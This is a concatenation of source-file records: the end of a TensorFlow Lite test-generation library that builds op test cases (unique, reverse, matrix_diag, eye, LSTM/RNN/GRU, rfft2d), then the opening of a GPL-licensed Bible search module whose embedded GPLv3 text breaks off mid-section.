"input_shape": [[5]],
"index_type": [tf.int32, tf.int64],
"input_values": [[3, 2, 1, 2, 3]]
},
{
"input_shape": [[7]],
"index_type": [tf.int32, tf.int64],
"input_values": [[1, 1, 1, 1, 1, 1, 1]]
},
{
"input_shape": [[5]],
"index_type": [tf.int32, tf.int64],
"input_values": [[3, 2, 1, 0, -1]]
}]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.int32, name="input", shape=parameters["input_shape"])
if parameters["index_type"] is None:
output = tf.unique(input_tensor)
else:
output = tf.unique(input_tensor, parameters["index_type"])
return [input_tensor], output
def build_inputs(parameters, sess, inputs, outputs):
input_values = [create_tensor_data(tf.int32, parameters["input_shape"])]
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reverse_v2_tests(options):
"""Make a set of tests to do reverse_v2."""
test_parameters = [{
"base_shape": [[3, 4, 3], [3, 4], [5, 6, 7, 8]],
"axis": [0, 1, 2, 3],
}]
def get_valid_axis(parameters):
"""Return a tweaked version of 'axis'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
while axis > len(shape) - 1:
axis -= 1
return axis
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name=("input"), shape=parameters["base_shape"])
outs = tf.reverse(input_tensor, axis=[get_valid_axis(parameters)])
return [input_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(np.float32, shape=parameters["base_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reverse_sequence_tests(options):
"""Make a set of tests to do reverse_sequence."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[8, 4, 5, 5, 6], [4, 4, 3, 5]],
"seq_lengths": [[2, 2, 2, 2], [2, 1, 1, 0]],
"seq_axis": [0, 3],
"batch_axis": [1]
},
{
"input_dtype": [tf.float32],
"input_shape": [[2, 4, 5, 5, 6]],
"seq_lengths": [[2, 1]],
"seq_axis": [2],
"batch_axis": [0]
},
{
"input_dtype": [tf.float32],
"input_shape": [[4, 2]],
"seq_lengths": [[3, 1]],
"seq_axis": [0],
"batch_axis": [1]
}]
def build_graph(parameters):
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
outs = tf.reverse_sequence(
input_value,
seq_lengths=parameters["seq_lengths"],
batch_axis=parameters["batch_axis"],
seq_axis=parameters["seq_axis"])
return [input_value], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_matrix_diag_tests(options):
"""Make a set of tests for tf.linalg.diag op."""
test_parameters = [
{
"input_shape": [[3], [2, 3], [3, 4, 5], [2, 4, 6, 8]],
"input_dtype": [tf.int32, tf.float32],
},
]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
outs = tf.matrix_diag(input_tensor)
return [input_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_matrix_set_diag_tests(options):
"""Make a set of tests for tf.linalg.set_diag op."""
test_parameters = [
{
"input_diag_shapes": [([3, 3], [3]), ([2, 3], [2]), ([2, 4, 4],
[2, 4]),
([3, 4, 5, 6], [3, 4, 5])],
"input_dtype": [tf.int32, tf.float32, tf.uint8],
},
]
def build_graph(parameters):
input_shape = parameters["input_diag_shapes"][0]
diag_shape = parameters["input_diag_shapes"][1]
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"], name="input", shape=input_shape)
diag_tensor = tf.placeholder(
dtype=parameters["input_dtype"], name="diagonal", shape=diag_shape)
outs = tf.matrix_set_diag(input_tensor, diag_tensor)
return [input_tensor, diag_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_shape = parameters["input_diag_shapes"][0]
diag_shape = parameters["input_diag_shapes"][1]
input_values = create_tensor_data(parameters["input_dtype"], input_shape)
diag_values = create_tensor_data(parameters["input_dtype"], diag_shape)
return [input_values, diag_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values, diag_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_eye_tests(options):
"""Make a set of tests for tf.eye op."""
test_parameters = [{
"num_rows_shape": [[]],
"num_cols_shape": [[]],
"batch_shape": [[3], [2, 4], [4, 5, 6], None],
"use_num_cols": [True, False],
"dtype": [tf.float32, tf.int32],
}]
def build_graph(parameters):
input_tensor0 = tf.placeholder(
dtype=tf.int32, name="num_rows", shape=parameters["num_rows_shape"])
input_tensor1 = tf.placeholder(
dtype=tf.int32, name="num_columns", shape=parameters["num_cols_shape"])
if parameters["use_num_cols"]:
outs = tf.eye(
num_rows=input_tensor0,
num_columns=input_tensor1,
batch_shape=parameters["batch_shape"],
dtype=parameters["dtype"])
return [input_tensor0, input_tensor1], [outs]
else:
outs = tf.eye(num_rows=input_tensor0, dtype=parameters["dtype"])
return [input_tensor0], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value0 = create_scalar_data(dtype=np.int32, min_value=1)
input_value1 = create_scalar_data(dtype=np.int32, min_value=1)
if parameters["use_num_cols"]:
return [input_value0, input_value1], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value0, input_value1])))
else:
return [input_value0], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value0])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function(name="make_unidirectional_sequence_lstm_tests")
@test_util.enable_control_flow_v2
def make_unidirectional_sequence_lstm_tests(options):
"""Make a set of tests to do unidirectional_sequence_lstm."""
test_parameters = [{
"batch_size": [2, 4, 6],
"seq_length": [1, 3],
"units": [4, 5],
"use_peepholes": [False, True],
"is_dynamic_rnn": [False, True]
}]
def build_graph(parameters):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = tf.placeholder(dtype=tf.float32, name="input", shape=shape)
input_values.append(input_value)
lstm_cell = tf.lite.experimental.nn.TFLiteLSTMCell(
parameters["units"],
use_peepholes=parameters["use_peepholes"])
outs, _ = tf.lite.experimental.nn.dynamic_rnn(
lstm_cell, input_value, dtype=tf.float32, time_major=True)
outs = tf.unstack(outs, axis=1)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = tf.placeholder(
dtype=tf.float32, name=("input_%d" % i), shape=shape)
input_values.append(input_value)
lstm_cell = tf.lite.experimental.nn.TFLiteLSTMCell(
parameters["units"], use_peepholes=parameters["use_peepholes"])
outs, _ = tf.nn.static_rnn(lstm_cell, input_values, dtype=tf.float32)
real_output = tf.zeros([1], dtype=tf.float32) + outs[-1]
return input_values, [real_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
init = tf.global_variables_initializer()
sess.run(init)
# Tflite fused kernel takes input as [time, batch, input].
# For static unidirectional sequence lstm, the input is an array sized of
# time, and pack the array together, however, for time = 1, the input is
# not packed.
tflite_input_values = input_values
if not parameters["is_dynamic_rnn"] and parameters["seq_length"] == 1:
tflite_input_values = [
input_values[0].reshape((1, parameters["batch_size"],
parameters["units"]))
]
return tflite_input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function(name="make_unidirectional_sequence_rnn_tests")
@test_util.enable_control_flow_v2
def make_unidirectional_sequence_rnn_tests(options):
"""Make a set of tests to do unidirectional_sequence_rnn."""
test_parameters = [{
"batch_size": [2, 4, 6],
"seq_length": [1, 3],
"units": [4, 5],
"is_dynamic_rnn": [False, True]
}]
def build_graph(parameters):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = tf.placeholder(dtype=tf.float32, name="input", shape=shape)
input_values.append(input_value)
rnn_cell = tf.lite.experimental.nn.TfLiteRNNCell(parameters["units"])
outs, _ = tf.lite.experimental.nn.dynamic_rnn(
rnn_cell, input_value, dtype=tf.float32, time_major=True)
outs = tf.unstack(outs, axis=1)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = tf.placeholder(
dtype=tf.float32, name=("input_%d" % i), shape=shape)
input_values.append(input_value)
rnn_cell = tf.lite.experimental.nn.TfLiteRNNCell(parameters["units"])
outs, _ = tf.nn.static_rnn(rnn_cell, input_values, dtype=tf.float32)
real_output = tf.zeros([1], dtype=tf.float32) + outs[-1]
return input_values, [real_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
init = tf.global_variables_initializer()
sess.run(init)
# Tflite fused kernel takes input as [time, batch, input].
# For static unidirectional sequence rnn, the input is an array sized of
# time, and pack the array together, however, for time = 1, the input is
# not packed.
tflite_input_values = input_values
if not parameters["is_dynamic_rnn"] and parameters["seq_length"] == 1:
tflite_input_values = [
input_values[0].reshape((1, parameters["batch_size"],
parameters["units"]))
]
return tflite_input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_unfused_gru_tests(options):
"""Make a set of tests for unfused gru op."""
test_parameters = [{
"units": [2, 5],
"batch_size": [1, 2],
"time": [3],
}]
def build_graph(parameters):
inputs = [
tf.placeholder(tf.float32,
[parameters["batch_size"], parameters["units"]])
for _ in range(parameters["time"])
]
cell_fw = tf.nn.rnn_cell.GRUCell(parameters["units"])
cell_bw = tf.nn.rnn_cell.GRUCell(parameters["units"])
outputs, _, _ = tf.nn.static_bidirectional_rnn(
cell_fw, cell_bw, inputs, dtype=tf.float32)
return inputs, outputs
def build_inputs(parameters, sess, inputs, outputs):
input_values = [
create_tensor_data(tf.float32,
[parameters["batch_size"], parameters["units"]])
for _ in range(parameters["time"])
]
init = tf.global_variables_initializer()
sess.run(init)
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_rfft2d_tests(options):
"""Make a set of tests to do rfft2d."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[8, 8], [3, 8, 8]],
"fft_length": [
None, [4, 4], [4, 8], [8, 4], [8, 8], [8, 16], [16, 8], [16, 16]
]
}]
def build_graph(parameters):
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
with spectral_ops_test_util.fft_kernel_label_map():
outs = tf.signal.rfft2d(input_value, fft_length=parameters["fft_length"])
return [input_value], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
extra_toco_options = ExtraTocoOptions()
extra_toco_options.allow_custom_ops = True
make_zip_of_tests(options, test_parameters, build_graph, build_inputs,
extra_toco_options)
# Toco binary path provided by the generate rule.
bin_path = None
def generate_examples(options):
global bin_path
def mkdir_if_not_exist(x):
if not os.path.isdir(x):
os.mkdir(x)
if not os.path.isdir(x):
raise RuntimeError("Failed to create dir %r" % x)
opstest_path = os.path.join(options.output_path)
mkdir_if_not_exist(opstest_path)
out = options.zip_to_output
bin_path = options.toco
# Some zip filenames contain a postfix identifying the conversion mode. The
# list of valid conversion modes is defined in
# generated_test_conversion_modes() in build_def.bzl.
test_function = ("make_%s_tests" % (out.replace(".zip", "").replace(
"pb2lite", "").replace("toco-flex", "").rstrip("_")))
if test_function not in _MAKE_TEST_FUNCTIONS_MAP:
raise RuntimeError("Can't find a test function to create %r. Tried %r" %
(out, test_function))
_MAKE_TEST_FUNCTIONS_MAP[test_function](options)
|
alsrgv/tensorflow
|
tensorflow/lite/testing/generate_examples_lib.py
|
Python
|
apache-2.0
| 176,619 | 0.005588 |
#!/usr/bin/env python
# vim: sw=4:ts=4:sts=4:fdm=indent:fdl=0:
# -*- coding: UTF8 -*-
#
# A sword KJV indexed search module.
# Copyright (C) 2012 Josiah Gordon <josiahg@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
copying_str = \
'''
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
